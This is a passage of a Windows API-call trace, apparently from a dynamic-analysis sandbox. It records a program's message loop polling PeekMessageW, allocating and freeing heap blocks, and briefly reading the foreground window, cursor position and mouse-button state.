lpMsg=0x75f90c) returned 0 [0268.713] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.713] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0268.713] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff00 [0268.713] Sleep (dwMilliseconds=0x0) [0268.713] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0268.713] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0268.713] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.713] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.713] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.713] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.713] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.713] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.713] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.713] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.713] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.714] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.714] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.714] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.714] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.714] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.714] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.714] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.714] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.714] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.714] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0268.714] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff00 [0268.714] Sleep (dwMilliseconds=0x0) [0268.714] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0268.714] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0268.714] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.714] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.714] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.714] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.714] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.714] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.714] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.714] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.714] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.714] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.714] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.715] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.715] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.715] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.715] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.715] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.715] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.715] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.715] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0268.715] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff00 [0268.715] Sleep (dwMilliseconds=0x0) [0268.715] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0268.715] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0268.715] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.715] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.715] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.715] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.715] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.715] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.715] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.715] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.715] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.715] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.715] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.715] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.716] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.716] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.716] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.716] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.716] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.716] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.716] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0268.716] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff00 [0268.716] Sleep (dwMilliseconds=0x0) [0268.716] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0268.716] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0268.716] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.716] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.716] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.716] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.716] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.716] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.716] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.716] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.716] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.716] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.716] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.716] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.716] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.716] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.716] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.717] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.717] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.717] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.717] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0268.717] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff00 [0268.717] Sleep (dwMilliseconds=0x0) [0268.717] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0268.717] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0268.717] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.717] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.717] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.717] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.717] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.717] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.717] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.717] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.717] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.717] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.717] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.717] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.717] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.717] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.717] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.717] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.718] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.718] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.718] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0268.718] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff00 [0268.718] Sleep (dwMilliseconds=0x0) [0268.718] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0268.718] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0268.718] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.718] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.718] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.718] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.718] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.718] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.718] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.718] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.718] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.718] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.718] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.718] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.718] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.718] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.718] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.719] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.719] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.719] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.719] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0268.719] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff00 [0268.719] Sleep (dwMilliseconds=0x0) [0268.719] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0268.719] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0268.719] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.719] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.719] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.719] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.719] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.721] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.721] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.721] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.721] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.721] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.721] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.721] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0268.721] TranslateAcceleratorW (hWnd=0xa0170, hAccTable=0x19010b, lpMsg=0x75f90c) returned 0 [0268.721] TranslateMessage (lpMsg=0x75f90c) returned 0 [0268.721] DispatchMessageW (lpMsg=0x75f90c) returned 0x0 [0268.721] GetForegroundWindow () returned 0xa0170 [0268.721] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.721] GetCursorPos (in: lpPoint=0x75f748 | out: lpPoint=0x75f748*(x=546, y=527)) returned 1 [0268.721] ScreenToClient (in: hWnd=0xa0170, lpPoint=0x75f748 | out: lpPoint=0x75f748) returned 1 [0268.721] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x24) returned 0xdabb80 [0268.722] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0268.722] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe40 [0268.722] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff00 [0268.722] GetAsyncKeyState (vKey=1) returned 0 [0268.722] GetAsyncKeyState (vKey=2) returned 0 [0268.722] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.722] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.722] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.722] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.722] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.722] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.722] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.722] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.722] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.722] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0268.722] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0268.722] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.722] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdabb80 | out: hHeap=0xb80000) returned 1 [0268.722] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.722] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.722] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.722] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.722] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.722] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.723] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.723] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.723] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.723] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.723] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.723] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.723] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.723] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.723] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.723] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.723] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.723] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.723] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.723] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.723] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.723] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.723] Sleep (dwMilliseconds=0x0) [0268.723] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.723] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.723] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.723] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.723] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.723] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.723] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.723] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.724] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.724] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.724] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.724] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.724] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.724] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.724] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.724] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.724] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.724] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.724] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.724] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.724] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.724] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.724] Sleep (dwMilliseconds=0x0) [0268.724] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.724] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.724] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.724] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, 